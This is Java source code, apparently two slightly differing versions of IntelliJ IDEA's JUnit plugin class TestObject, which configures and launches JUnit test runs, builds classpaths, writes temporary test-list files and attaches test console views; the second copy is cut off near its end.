com.intellij.refactoring.listeners.RefactoringElementListener; import com.intellij.rt.execution.junit.IDEAJUnitListener; import com.intellij.rt.execution.junit.JUnitStarter; import com.intellij.util.Function; import com.intellij.util.PathUtil; import jetbrains.buildServer.messages.serviceMessages.ServiceMessageTypes; import org.jetbrains.annotations.NonNls; import org.jetbrains.annotations.NotNull; import org.jetbrains.jps.model.serialization.PathMacroUtil; import java.io.File; import java.io.IOException; import java.io.PrintWriter; import java.util.*; public abstract class TestObject implements JavaCommandLine { protected static final Logger LOG = Logger.getInstance("#com.intellij.execution.junit.TestObject"); private static final String MESSAGE = ExecutionBundle.message("configuration.not.speficied.message"); @NonNls private static final String JUNIT_TEST_FRAMEWORK_NAME = "JUnit"; protected JavaParameters myJavaParameters; private final Project myProject; protected final JUnitConfiguration myConfiguration; protected final ExecutionEnvironment myEnvironment; protected File myTempFile = null; protected File myWorkingDirsFile = null; public File myListenersFile; public static TestObject fromString(final String id, final Project project, final JUnitConfiguration configuration, ExecutionEnvironment environment) { if (JUnitConfiguration.TEST_METHOD.equals(id)) return new TestMethod(project, configuration, environment); if (JUnitConfiguration.TEST_CLASS.equals(id)) return new TestClass(project, configuration, environment); if (JUnitConfiguration.TEST_PACKAGE.equals(id)) return new TestPackage(project, configuration, environment); else if (JUnitConfiguration.TEST_DIRECTORY.equals(id)) { return new TestDirectory(project, configuration, environment); } if (JUnitConfiguration.TEST_PATTERN.equals(id)) { return new TestsPattern(project, configuration, environment); } return NOT_CONFIGURED; } public Module[] getModulesToCompile() { final SourceScope sourceScope = getSourceScope(); return sourceScope != null ? sourceScope.getModulesToCompile() : Module.EMPTY_ARRAY; } protected TestObject(final Project project, final JUnitConfiguration configuration, ExecutionEnvironment environment) { myProject = project; myConfiguration = configuration; myEnvironment = environment; } public abstract String suggestActionName(); public RunnerSettings getRunnerSettings() { return myEnvironment.getRunnerSettings(); } public abstract RefactoringElementListener getListener(PsiElement element, JUnitConfiguration configuration); public abstract boolean isConfiguredByElement(JUnitConfiguration configuration, PsiClass testClass, PsiMethod testMethod, PsiPackage testPackage); protected void configureModule(final JavaParameters parameters, final RunConfigurationModule configurationModule, final String mainClassName) throws CantRunException { int classPathType = JavaParametersUtil.getClasspathType(configurationModule, mainClassName, true); JavaParametersUtil.configureModule(configurationModule, parameters, classPathType, myConfiguration.isAlternativeJrePathEnabled() ? myConfiguration.getAlternativeJrePath() : null); } private static final TestObject NOT_CONFIGURED = new TestObject(null, null, null) { @Override public RefactoringElementListener getListener(final PsiElement element, final JUnitConfiguration configuration) { return null; } @Override public String suggestActionName() { throw new RuntimeException(String.valueOf(myConfiguration)); } @Override public boolean isConfiguredByElement(final JUnitConfiguration configuration, PsiClass testClass, PsiMethod testMethod, PsiPackage testPackage) { return false; } @Override public void checkConfiguration() throws RuntimeConfigurationException { throw new RuntimeConfigurationError(MESSAGE); } @Override public JavaParameters getJavaParameters() throws ExecutionException { throw new ExecutionException(MESSAGE); } @Override protected void initialize() throws ExecutionException { throw new ExecutionException(MESSAGE); } }; public void checkConfiguration() throws RuntimeConfigurationException{ JavaParametersUtil.checkAlternativeJRE(myConfiguration); ProgramParametersUtil.checkWorkingDirectoryExist(myConfiguration, myConfiguration.getProject(), myConfiguration.getConfigurationModule().getModule()); } public SourceScope getSourceScope() { return SourceScope.modulesWithDependencies(myConfiguration.getModules()); } protected void initialize() throws ExecutionException { JavaParametersUtil.configureConfiguration(myJavaParameters, myConfiguration); myJavaParameters.setMainClass(JUnitConfiguration.JUNIT_START_CLASS); final Module module = myConfiguration.getConfigurationModule().getModule(); if (myJavaParameters.getJdk() == null){ myJavaParameters.setJdk(module != null ? ModuleRootManager.getInstance(module).getSdk() : ProjectRootManager.getInstance(myProject).getProjectSdk()); } myJavaParameters.getClassPath().add(JavaSdkUtil.getIdeaRtJarPath()); myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(JUnitStarter.class)); if (Registry.is("junit_sm_runner", false)) { myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(ServiceMessageTypes.class)); } myJavaParameters.getProgramParametersList().add(JUnitStarter.IDE_VERSION + JUnitStarter.VERSION); for (RunConfigurationExtension ext : Extensions.getExtensions(RunConfigurationExtension.EP_NAME)) { ext.updateJavaParameters(myConfiguration, myJavaParameters, getRunnerSettings()); } final Object[] listeners = Extensions.getExtensions(IDEAJUnitListener.EP_NAME); final StringBuilder buf = new StringBuilder(); for (final Object listener : listeners) { boolean enabled = true; for (RunConfigurationExtension ext : Extensions.getExtensions(RunConfigurationExtension.EP_NAME)) { if (ext.isListenerDisabled(myConfiguration, listener, getRunnerSettings())) { enabled = false; break; } } if (enabled) { final Class classListener = listener.getClass(); buf.append(classListener.getName()).append("\n"); myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(classListener)); } } if (buf.length() > 0) { try { myListenersFile = FileUtil.createTempFile("junit_listeners_", ""); myListenersFile.deleteOnExit(); myJavaParameters.getProgramParametersList().add("@@" + myListenersFile.getPath()); FileUtil.writeToFile(myListenersFile, buf.toString().getBytes(CharsetToolkit.UTF8_CHARSET)); } catch (IOException e) { LOG.error(e); } } } @Override public JavaParameters getJavaParameters() throws ExecutionException { if (myJavaParameters == null) { myJavaParameters = new JavaParameters(); initialize(); final Module module = myConfiguration.getConfigurationModule().getModule(); final Object[] patchers = Extensions.getExtensions(ExtensionPoints.JUNIT_PATCHER); for (Object patcher : patchers) { ((JUnitPatcher)patcher).patchJavaParameters(module, myJavaParameters); } } return myJavaParameters; } @Override public ExecutionResult execute(final Executor executor, @NotNull final ProgramRunner runner) throws ExecutionException { final boolean smRunner = Registry.is("junit_sm_runner", false); if (smRunner) { myJavaParameters.getVMParametersList().add("-Didea.junit.sm_runner"); } final JUnitProcessHandler handler = createHandler(executor); final RunnerSettings runnerSettings = getRunnerSettings(); JavaRunConfigurationExtensionManager.getInstance().attachExtensionsToProcess(myConfiguration, handler, runnerSettings); if (smRunner) { return useSmRunner(executor, handler); } final TestProxy unboundOutputRoot = new TestProxy(new RootTestInfo()); final JUnitConsoleProperties consoleProperties = new JUnitConsoleProperties(myConfiguration, executor); final JUnitTreeConsoleView consoleView = new JUnitTreeConsoleView(consoleProperties, myEnvironment, unboundOutputRoot); consoleView.initUI(); consoleView.attachToProcess(handler); unboundOutputRoot.setPrinter(consoleView.getPrinter()); Disposer.register(consoleView, unboundOutputRoot); final TestsPacketsReceiver packetsReceiver = new TestsPacketsReceiver(consoleView, unboundOutputRoot) { @Override public synchronized void notifyStart(TestProxy root) { if (!isRunning()) return; super.notifyStart(root); unboundOutputRoot.addChild(root); if (myConfiguration.isSaveOutputToFile()) { unboundOutputRoot.setOutputFilePath(myConfiguration.getOutputFilePath()); } final JUnitRunningModel model = getModel(); if (model != null) { handler.getOut().setDispatchListener(model.getNotifier()); Disposer.register(model, new Disposable() { @Override public void dispose() { handler.getOut().setDispatchListener(DispatchListener.DEAF); } }); consoleView.attachToModel(model); } } }; Disposer.register(consoleView, packetsReceiver); final DeferredActionsQueue queue = new DeferredActionsQueueImpl(); handler.getOut().setPacketDispatcher(packetsReceiver, queue); handler.getErr().setPacketDispatcher(packetsReceiver, queue); handler.addProcessListener(new ProcessAdapter() { private boolean myStarted = false; @Override public void startNotified(ProcessEvent event) { myStarted = true; } @Override public void processTerminated(ProcessEvent event) { handler.removeProcessListener(this); if (myTempFile != null) { FileUtil.delete(myTempFile); } if (myListenersFile != null) { FileUtil.delete(myListenersFile); } final Runnable runnable = new Runnable() { @Override public void run() { unboundOutputRoot.flush(); packetsReceiver.checkTerminated(); final JUnitRunningModel model = packetsReceiver.getModel(); notifyByBalloon(model, myStarted, consoleProperties); } }; handler.getOut().addRequest(runnable, queue); } @Override public void onTextAvailable(final ProcessEvent event, final Key outputType) { final String text = event.getText(); final ConsoleViewContentType consoleViewType = ConsoleViewContentType.getConsoleViewType(outputType); final Printable printable = new Printable() { @Override public void printOn(final Printer printer) { printer.print(text, consoleViewType); } }; final Extractor extractor; if (consoleViewType == ConsoleViewContentType.ERROR_OUTPUT || consoleViewType == ConsoleViewContentType.SYSTEM_OUTPUT) { extractor = handler.getErr(); } else { extractor = handler.getOut(); } extractor.getEventsDispatcher().processOutput(printable); } }); final RerunFailedTestsAction rerunFailedTestsAction = new RerunFailedTestsAction(consoleView); rerunFailedTestsAction.init(consoleProperties, myEnvironment); rerunFailedTestsAction.setModelProvider(new Getter<TestFrameworkRunningModel>() { @Override public TestFrameworkRunningModel get() { return packetsReceiver.getModel(); } }); final DefaultExecutionResult result = new DefaultExecutionResult(consoleView, handler); result.setRestartActions(rerunFailedTestsAction); return result; } private ExecutionResult useSmRunner(Executor executor, JUnitProcessHandler handler) { TestConsoleProperties testConsoleProperties = new SMTRunnerConsoleProperties( new RuntimeConfigurationProducer.DelegatingRuntimeConfiguration<JUnitConfiguration>( (JUnitConfiguration)myEnvironment.getRunProfile()), JUNIT_TEST_FRAMEWORK_NAME, executor ); testConsoleProperties.setIfUndefined(TestConsoleProperties.HIDE_PASSED_TESTS, false); BaseTestsOutputConsoleView smtConsoleView = SMTestRunnerConnectionUtil.createConsoleWithCustomLocator( JUNIT_TEST_FRAMEWORK_NAME, testConsoleProperties, myEnvironment, null); Disposer.register(myProject, smtConsoleView); final ConsoleView consoleView = smtConsoleView; consoleView.attachToProcess(handler); final RerunFailedTestsAction rerunFailedTestsAction = new RerunFailedTestsAction(consoleView); rerunFailedTestsAction.init(testConsoleProperties, myEnvironment); rerunFailedTestsAction.setModelProvider(new Getter<TestFrameworkRunningModel>() { @Override public TestFrameworkRunningModel get() { return ((SMTRunnerConsoleView)consoleView).getResultsViewer(); } }); final DefaultExecutionResult result = new DefaultExecutionResult(consoleView, handler); result.setRestartActions(rerunFailedTestsAction); return result; } protected void notifyByBalloon(JUnitRunningModel model, boolean started, JUnitConsoleProperties consoleProperties) { String comment; if (model != null) { final CompletionEvent done = model.getProgress().getDone(); comment = done != null ? done.getComment() : null; } else { comment = null; } TestsUIUtil.notifyByBalloon(myProject, started, model != null ? model.getRoot() : null, consoleProperties, comment); } protected JUnitProcessHandler createHandler(Executor executor) throws ExecutionException { appendForkInfo(executor); return JUnitProcessHandler.runCommandLine(CommandLineBuilder.createFromJavaParameters(myJavaParameters, myProject, true)); } private boolean forkPerModule() { final String workingDirectory = myConfiguration.getWorkingDirectory(); return JUnitConfiguration.TEST_PACKAGE.equals(myConfiguration.getPersistentData().TEST_OBJECT) && myConfiguration.getPersistentData().getScope() != TestSearchScope.SINGLE_MODULE && ("$" + PathMacroUtil.MODULE_DIR_MACRO_NAME + "$").equals(workingDirectory); } private void appendForkInfo(Executor executor) throws ExecutionException { final String forkMode = myConfiguration.getForkMode(); if (Comparing.strEqual(forkMode, "none")) { final String workingDirectory = myConfiguration.getWorkingDirectory(); if (!JUnitConfiguration.TEST_PACKAGE.equals(myConfiguration.getPersistentData().TEST_OBJECT) || myConfiguration.getPersistentData().getScope() == TestSearchScope.SINGLE_MODULE || !("$" + PathMacroUtil.MODULE_DIR_MACRO_NAME + "$").equals(workingDirectory)) { return; } } if (getRunnerSettings() != null) { final String actionName = executor.getActionName(); throw new CantRunException(actionName + " is disabled in fork mode.<br/>Please change fork mode to &lt;none&gt; to " + actionName.toLowerCase() + "."); } final JavaParameters javaParameters = getJavaParameters(); final Sdk jdk = javaParameters.getJdk(); if (jdk == null) { throw new ExecutionException(ExecutionBundle.message("run.configuration.error.no.jdk.specified")); } try { final File tempFile = FileUtil.createTempFile("command.line", "", true); final PrintWriter writer = new PrintWriter(tempFile, CharsetToolkit.UTF8); try { writer.println(((JavaSdkType)jdk.getSdkType()).getVMExecutablePath(jdk)); for (String vmParameter : javaParameters.getVMParametersList().getList()) { writer.println(vmParameter); } writer.println("-classpath"); writer.println(javaParameters.getClassPath().getPathsString()); } finally { writer.close(); } myJavaParameters.getProgramParametersList().add("@@@" + forkMode + ',' + tempFile.getAbsolutePath()); } catch (Exception e) { LOG.error(e); } } protected <T> void addClassesListToJavaParameters(Collection<? extends T> elements, Function<T, String> nameFunction, String packageName, boolean createTempFile, boolean junit4) { try { if (createTempFile) { myTempFile = FileUtil.createTempFile("idea_junit", ".tmp"); myTempFile.deleteOnExit(); myJavaParameters.getProgramParametersList().add("@" + myTempFile.getAbsolutePath()); } final Map<String, List<String>> perModule = forkPerModule() ? new TreeMap<String, List<String>>() : null; final PrintWriter writer = new PrintWriter(myTempFile, CharsetToolkit.UTF8); try { writer.println(packageName); final List<String> testNames = new ArrayList<String>(); for (final T element : elements) { final String name = nameFunction.fun(element); if (name == null) { LOG.error("invalid element " + element); return; } if (perModule != null && element instanceof PsiElement) { final Module module = ModuleUtilCore.findModuleForPsiElement((PsiElement)element); if (module != null) { final String moduleDir = PathMacroUtil.getModuleDir(module.getModuleFilePath()); List<String> list = perModule.get(moduleDir); if (list == null) { list = new ArrayList<String>(); perModule.put(moduleDir, list); } list.add(name); } } else { testNames.add(name); } } if (perModule != null) { for (List<String> perModuleClasses : perModule.values()) { Collections.sort(perModuleClasses); testNames.addAll(perModuleClasses); } } else { Collections.sort(testNames); //sort tests in FQN order } for (String testName : testNames) { writer.println(testName); } } finally { writer.close(); } if (perModule != null && perModule.size() > 1) { final PrintWriter wWriter = new PrintWriter(myWorkingDirsFile, CharsetToolkit.UTF8); try { wWriter.println(packageName); for (String workingDir : perModule.keySet()) { wWriter.println(workingDir); final List<String> classNames = perModule.get(workingDir); wWriter.println(classNames.size()); for (String className : classNames) { wWriter.println(className); } } } finally { wWriter.close(); } } } catch (IOException e) { LOG.error(e); } } public void clear() { myJavaParameters = null; } }
plugins/junit/src/com/intellij/execution/junit/TestObject.java
/* * Copyright 2000-2011 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.execution.junit; import com.intellij.ExtensionPoints; import com.intellij.execution.*; import com.intellij.execution.configurations.*; import com.intellij.execution.junit2.TestProxy; import com.intellij.execution.junit2.segments.DeferredActionsQueue; import com.intellij.execution.junit2.segments.DeferredActionsQueueImpl; import com.intellij.execution.junit2.segments.DispatchListener; import com.intellij.execution.junit2.segments.Extractor; import com.intellij.execution.junit2.ui.JUnitTreeConsoleView; import com.intellij.execution.junit2.ui.TestsPacketsReceiver; import com.intellij.execution.junit2.ui.actions.RerunFailedTestsAction; import com.intellij.execution.junit2.ui.model.CompletionEvent; import com.intellij.execution.junit2.ui.model.JUnitRunningModel; import com.intellij.execution.junit2.ui.model.RootTestInfo; import com.intellij.execution.junit2.ui.properties.JUnitConsoleProperties; import com.intellij.execution.process.ProcessAdapter; import com.intellij.execution.process.ProcessEvent; import com.intellij.execution.runners.ExecutionEnvironment; import com.intellij.execution.runners.ProgramRunner; import com.intellij.execution.testframework.*; import com.intellij.execution.testframework.sm.SMTestRunnerConnectionUtil; import com.intellij.execution.testframework.sm.runner.SMTRunnerConsoleProperties; import com.intellij.execution.testframework.sm.runner.ui.SMTRunnerConsoleView; import com.intellij.execution.testframework.ui.BaseTestsOutputConsoleView; import com.intellij.execution.ui.ConsoleView; import com.intellij.execution.ui.ConsoleViewContentType; import com.intellij.execution.util.JavaParametersUtil; import com.intellij.execution.util.ProgramParametersUtil; import com.intellij.openapi.Disposable; import com.intellij.openapi.diagnostic.Logger; import com.intellij.openapi.extensions.Extensions; import com.intellij.openapi.module.Module; import com.intellij.openapi.module.ModuleUtilCore; import com.intellij.openapi.project.Project; import com.intellij.openapi.projectRoots.JavaSdkType; import com.intellij.openapi.projectRoots.Sdk; import com.intellij.openapi.projectRoots.ex.JavaSdkUtil; import com.intellij.openapi.roots.ModuleRootManager; import com.intellij.openapi.roots.ProjectRootManager; import com.intellij.openapi.util.Comparing; import com.intellij.openapi.util.Disposer; import com.intellij.openapi.util.Getter; import com.intellij.openapi.util.Key; import com.intellij.openapi.util.io.FileUtil; import com.intellij.openapi.util.registry.Registry; import com.intellij.openapi.vfs.CharsetToolkit; import com.intellij.psi.PsiClass; import com.intellij.psi.PsiElement; import com.intellij.psi.PsiMethod; import com.intellij.psi.PsiPackage; import com.intellij.refactoring.listeners.RefactoringElementListener; import com.intellij.rt.execution.junit.IDEAJUnitListener; import com.intellij.rt.execution.junit.JUnitStarter; import com.intellij.util.Function; import com.intellij.util.PathUtil; import jetbrains.buildServer.messages.serviceMessages.ServiceMessageTypes; import org.jetbrains.annotations.NonNls; import org.jetbrains.annotations.NotNull; import org.jetbrains.jps.model.serialization.PathMacroUtil; import java.io.File; import java.io.IOException; import java.io.PrintWriter; import java.util.*; public abstract class TestObject implements JavaCommandLine { protected static final Logger LOG = Logger.getInstance("#com.intellij.execution.junit.TestObject"); private static final String MESSAGE = ExecutionBundle.message("configuration.not.speficied.message"); @NonNls private static final String JUNIT_TEST_FRAMEWORK_NAME = "JUnit"; protected JavaParameters myJavaParameters; private final Project myProject; protected final JUnitConfiguration myConfiguration; protected final ExecutionEnvironment myEnvironment; protected File myTempFile = null; protected File myWorkingDirsFile = null; public File myListenersFile; public static TestObject fromString(final String id, final Project project, final JUnitConfiguration configuration, ExecutionEnvironment environment) { if (JUnitConfiguration.TEST_METHOD.equals(id)) return new TestMethod(project, configuration, environment); if (JUnitConfiguration.TEST_CLASS.equals(id)) return new TestClass(project, configuration, environment); if (JUnitConfiguration.TEST_PACKAGE.equals(id)) return new TestPackage(project, configuration, environment); else if (JUnitConfiguration.TEST_DIRECTORY.equals(id)) { return new TestDirectory(project, configuration, environment); } if (JUnitConfiguration.TEST_PATTERN.equals(id)) { return new TestsPattern(project, configuration, environment); } return NOT_CONFIGURED; } public Module[] getModulesToCompile() { final SourceScope sourceScope = getSourceScope(); return sourceScope != null ? sourceScope.getModulesToCompile() : Module.EMPTY_ARRAY; } protected TestObject(final Project project, final JUnitConfiguration configuration, ExecutionEnvironment environment) { myProject = project; myConfiguration = configuration; myEnvironment = environment; } public abstract String suggestActionName(); public RunnerSettings getRunnerSettings() { return myEnvironment.getRunnerSettings(); } public abstract RefactoringElementListener getListener(PsiElement element, JUnitConfiguration configuration); public abstract boolean isConfiguredByElement(JUnitConfiguration configuration, PsiClass testClass, PsiMethod testMethod, PsiPackage testPackage); protected void configureModule(final JavaParameters parameters, final RunConfigurationModule configurationModule, final String mainClassName) throws CantRunException { int classPathType = JavaParametersUtil.getClasspathType(configurationModule, mainClassName, true); JavaParametersUtil.configureModule(configurationModule, parameters, classPathType, myConfiguration.isAlternativeJrePathEnabled() ? myConfiguration.getAlternativeJrePath() : null); } private static final TestObject NOT_CONFIGURED = new TestObject(null, null, null) { @Override public RefactoringElementListener getListener(final PsiElement element, final JUnitConfiguration configuration) { return null; } @Override public String suggestActionName() { throw new RuntimeException(String.valueOf(myConfiguration)); } @Override public boolean isConfiguredByElement(final JUnitConfiguration configuration, PsiClass testClass, PsiMethod testMethod, PsiPackage testPackage) { return false; } @Override public void checkConfiguration() throws RuntimeConfigurationException { throw new RuntimeConfigurationError(MESSAGE); } @Override public JavaParameters getJavaParameters() throws ExecutionException { throw new ExecutionException(MESSAGE); } @Override protected void initialize() throws ExecutionException { throw new ExecutionException(MESSAGE); } }; public void checkConfiguration() throws RuntimeConfigurationException{ JavaParametersUtil.checkAlternativeJRE(myConfiguration); ProgramParametersUtil.checkWorkingDirectoryExist(myConfiguration, myConfiguration.getProject(), myConfiguration.getConfigurationModule().getModule()); } public SourceScope getSourceScope() { return SourceScope.modulesWithDependencies(myConfiguration.getModules()); } protected void initialize() throws ExecutionException { JavaParametersUtil.configureConfiguration(myJavaParameters, myConfiguration); myJavaParameters.setMainClass(JUnitConfiguration.JUNIT_START_CLASS); final Module module = myConfiguration.getConfigurationModule().getModule(); if (myJavaParameters.getJdk() == null){ myJavaParameters.setJdk(module != null ? ModuleRootManager.getInstance(module).getSdk() : ProjectRootManager.getInstance(myProject).getProjectSdk()); } myJavaParameters.getClassPath().add(JavaSdkUtil.getIdeaRtJarPath()); myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(JUnitStarter.class)); if (Registry.is("junit_sm_runner", false)) { myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(ServiceMessageTypes.class)); } myJavaParameters.getProgramParametersList().add(JUnitStarter.IDE_VERSION + JUnitStarter.VERSION); for (RunConfigurationExtension ext : Extensions.getExtensions(RunConfigurationExtension.EP_NAME)) { ext.updateJavaParameters(myConfiguration, myJavaParameters, getRunnerSettings()); } final Object[] listeners = Extensions.getExtensions(IDEAJUnitListener.EP_NAME); final StringBuilder buf = new StringBuilder(); for (final Object listener : listeners) { boolean enabled = true; for (RunConfigurationExtension ext : Extensions.getExtensions(RunConfigurationExtension.EP_NAME)) { if (ext.isListenerDisabled(myConfiguration, listener, getRunnerSettings())) { enabled = false; break; } } if (enabled) { final Class classListener = listener.getClass(); buf.append(classListener.getName()).append("\n"); myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(classListener)); } } if (buf.length() > 0) { try { myListenersFile = FileUtil.createTempFile("junit_listeners_", ""); myListenersFile.deleteOnExit(); myJavaParameters.getProgramParametersList().add("@@" + myListenersFile.getPath()); FileUtil.writeToFile(myListenersFile, buf.toString().getBytes(CharsetToolkit.UTF8_CHARSET)); } catch (IOException e) { LOG.error(e); } } } @Override public JavaParameters getJavaParameters() throws ExecutionException { if (myJavaParameters == null) { myJavaParameters = new JavaParameters(); initialize(); final Module module = myConfiguration.getConfigurationModule().getModule(); final Object[] patchers = Extensions.getExtensions(ExtensionPoints.JUNIT_PATCHER); for (Object patcher : patchers) { ((JUnitPatcher)patcher).patchJavaParameters(module, myJavaParameters); } } return myJavaParameters; } @Override public ExecutionResult execute(final Executor executor, @NotNull final ProgramRunner runner) throws ExecutionException { final boolean smRunner = Registry.is("junit_sm_runner", false); if (smRunner) { myJavaParameters.getVMParametersList().add("-Didea.junit.sm_runner"); } final JUnitProcessHandler handler = createHandler(executor); final RunnerSettings runnerSettings = getRunnerSettings(); JavaRunConfigurationExtensionManager.getInstance().attachExtensionsToProcess(myConfiguration, handler, runnerSettings); if (smRunner) { return useSmRunner(executor, handler); } final TestProxy unboundOutputRoot = new TestProxy(new RootTestInfo()); final JUnitConsoleProperties consoleProperties = new JUnitConsoleProperties(myConfiguration, executor); final JUnitTreeConsoleView consoleView = new JUnitTreeConsoleView(consoleProperties, myEnvironment, unboundOutputRoot); consoleView.initUI(); consoleView.attachToProcess(handler); unboundOutputRoot.setPrinter(consoleView.getPrinter()); Disposer.register(consoleView, unboundOutputRoot); final TestsPacketsReceiver packetsReceiver = new TestsPacketsReceiver(consoleView, unboundOutputRoot) { @Override public synchronized void notifyStart(TestProxy root) { if (!isRunning()) return; super.notifyStart(root); unboundOutputRoot.addChild(root); if (myConfiguration.isSaveOutputToFile()) { unboundOutputRoot.setOutputFilePath(myConfiguration.getOutputFilePath()); } final JUnitRunningModel model = getModel(); if (model != null) { handler.getOut().setDispatchListener(model.getNotifier()); Disposer.register(model, new Disposable() { @Override public void dispose() { handler.getOut().setDispatchListener(DispatchListener.DEAF); } }); consoleView.attachToModel(model); } } }; final DeferredActionsQueue queue = new DeferredActionsQueueImpl(); handler.getOut().setPacketDispatcher(packetsReceiver, queue); handler.getErr().setPacketDispatcher(packetsReceiver, queue); handler.addProcessListener(new ProcessAdapter() { private boolean myStarted = false; @Override public void startNotified(ProcessEvent event) { myStarted = true; } @Override public void processTerminated(ProcessEvent event) { handler.removeProcessListener(this); if (myTempFile != null) { FileUtil.delete(myTempFile); } if (myListenersFile != null) { FileUtil.delete(myListenersFile); } final Runnable runnable = new Runnable() { @Override public void run() { unboundOutputRoot.flush(); packetsReceiver.checkTerminated(); final JUnitRunningModel model = packetsReceiver.getModel(); notifyByBalloon(model, myStarted, consoleProperties); } }; handler.getOut().addRequest(runnable, queue); } @Override public void onTextAvailable(final ProcessEvent event, final Key outputType) { final String text = event.getText(); final ConsoleViewContentType consoleViewType = ConsoleViewContentType.getConsoleViewType(outputType); final Printable printable = new Printable() { @Override public void printOn(final Printer printer) { printer.print(text, consoleViewType); } }; final Extractor extractor; if (consoleViewType == ConsoleViewContentType.ERROR_OUTPUT || consoleViewType == ConsoleViewContentType.SYSTEM_OUTPUT) { extractor = handler.getErr(); } else { extractor = handler.getOut(); } extractor.getEventsDispatcher().processOutput(printable); } }); final RerunFailedTestsAction rerunFailedTestsAction = new RerunFailedTestsAction(consoleView); rerunFailedTestsAction.init(consoleProperties, myEnvironment); rerunFailedTestsAction.setModelProvider(new Getter<TestFrameworkRunningModel>() { @Override public TestFrameworkRunningModel get() { return packetsReceiver.getModel(); } }); final DefaultExecutionResult result = new DefaultExecutionResult(consoleView, handler); result.setRestartActions(rerunFailedTestsAction); return result; } private ExecutionResult useSmRunner(Executor executor, JUnitProcessHandler handler) { TestConsoleProperties testConsoleProperties = new SMTRunnerConsoleProperties( new RuntimeConfigurationProducer.DelegatingRuntimeConfiguration<JUnitConfiguration>( (JUnitConfiguration)myEnvironment.getRunProfile()), JUNIT_TEST_FRAMEWORK_NAME, executor ); testConsoleProperties.setIfUndefined(TestConsoleProperties.HIDE_PASSED_TESTS, false); BaseTestsOutputConsoleView smtConsoleView = SMTestRunnerConnectionUtil.createConsoleWithCustomLocator( JUNIT_TEST_FRAMEWORK_NAME, testConsoleProperties, myEnvironment, null); Disposer.register(myProject, smtConsoleView); final ConsoleView consoleView = smtConsoleView; consoleView.attachToProcess(handler); final RerunFailedTestsAction rerunFailedTestsAction = new RerunFailedTestsAction(consoleView); rerunFailedTestsAction.init(testConsoleProperties, myEnvironment); rerunFailedTestsAction.setModelProvider(new Getter<TestFrameworkRunningModel>() { @Override public TestFrameworkRunningModel get() { return ((SMTRunnerConsoleView)consoleView).getResultsViewer(); } }); final DefaultExecutionResult result = new DefaultExecutionResult(consoleView, handler); result.setRestartActions(rerunFailedTestsAction); return result; } protected void notifyByBalloon(JUnitRunningModel model, boolean started, JUnitConsoleProperties consoleProperties) { String comment; if (model != null) { final CompletionEvent done = model.getProgress().getDone(); comment = done != null ? done.getComment() : null; } else { comment = null; } TestsUIUtil.notifyByBalloon(myProject, started, model != null ? model.getRoot() : null, consoleProperties, comment); } protected JUnitProcessHandler createHandler(Executor executor) throws ExecutionException { appendForkInfo(executor); return JUnitProcessHandler.runCommandLine(CommandLineBuilder.createFromJavaParameters(myJavaParameters, myProject, true)); } private boolean forkPerModule() { final String workingDirectory = myConfiguration.getWorkingDirectory(); return JUnitConfiguration.TEST_PACKAGE.equals(myConfiguration.getPersistentData().TEST_OBJECT) && myConfiguration.getPersistentData().getScope() != TestSearchScope.SINGLE_MODULE && ("$" + PathMacroUtil.MODULE_DIR_MACRO_NAME + "$").equals(workingDirectory); } private void appendForkInfo(Executor executor) throws ExecutionException { final String forkMode = myConfiguration.getForkMode(); if (Comparing.strEqual(forkMode, "none")) { final String workingDirectory = myConfiguration.getWorkingDirectory(); if (!JUnitConfiguration.TEST_PACKAGE.equals(myConfiguration.getPersistentData().TEST_OBJECT) || myConfiguration.getPersistentData().getScope() == TestSearchScope.SINGLE_MODULE || !("$" + PathMacroUtil.MODULE_DIR_MACRO_NAME + "$").equals(workingDirectory)) { return; } } if (getRunnerSettings() != null) { final String actionName = executor.getActionName(); throw new CantRunException(actionName + " is disabled in fork mode.<br/>Please change fork mode to &lt;none&gt; to " + actionName.toLowerCase() + "."); } final JavaParameters javaParameters = getJavaParameters(); final Sdk jdk = javaParameters.getJdk(); if (jdk == null) { throw new ExecutionException(ExecutionBundle.message("run.configuration.error.no.jdk.specified")); } try { final File tempFile = FileUtil.createTempFile("command.line", "", true); final PrintWriter writer = new PrintWriter(tempFile, CharsetToolkit.UTF8); try { writer.println(((JavaSdkType)jdk.getSdkType()).getVMExecutablePath(jdk)); for (String vmParameter : javaParameters.getVMParametersList().getList()) { writer.println(vmParameter); } writer.println("-classpath"); writer.println(javaParameters.getClassPath().getPathsString()); } finally { writer.close(); } myJavaParameters.getProgramParametersList().add("@@@" + forkMode + ',' + tempFile.getAbsolutePath()); } catch (Exception e) { LOG.error(e); } } protected <T> void addClassesListToJavaParameters(Collection<? extends T> elements, Function<T, String> nameFunction, String packageName, boolean createTempFile, boolean junit4) { try { if (createTempFile) { myTempFile = FileUtil.createTempFile("idea_junit", ".tmp"); myTempFile.deleteOnExit(); myJavaParameters.getProgramParametersList().add("@" + myTempFile.getAbsolutePath()); } final Map<String, List<String>> perModule = forkPerModule() ? new TreeMap<String, List<String>>() : null; final PrintWriter writer = new PrintWriter(myTempFile, CharsetToolkit.UTF8); try { writer.println(packageName); final List<String> testNames = new ArrayList<String>(); for (final T element : elements) { final String name = nameFunction.fun(element); if (name == null) { LOG.error("invalid element " + element); return; } if (perModule != null && element instanceof PsiElement) { final Module module = ModuleUtilCore.findModuleForPsiElement((PsiElement)element); if (module != null) { final String moduleDir = PathMacroUtil.getModuleDir(module.getModuleFilePath()); List<String> list = perModule.get(moduleDir); if (list == null) { list = new ArrayList<String>(); perModule.put(moduleDir, list); } list.add(name); } } else { testNames.add(name); } } if (perModule != null) { for (List<String> perModuleClasses : perModule.values()) { Collections.sort(perModuleClasses); testNames.addAll(perModuleClasses); } } else { Collections.sort(testNames); //sort tests in FQN order } for (String testName : testNames) { writer.println(testName); } } finally { writer.close(); } if (perModule != null && perModule.size() > 1) { final PrintWriter wWriter = new PrintWriter(myWorkingDirsFile, CharsetToolkit.UTF8); try { wWriter.println(packageName); for (String workingDir : perModule.keySet()) { wWriter.println(workingDir); final List<String> classNames = 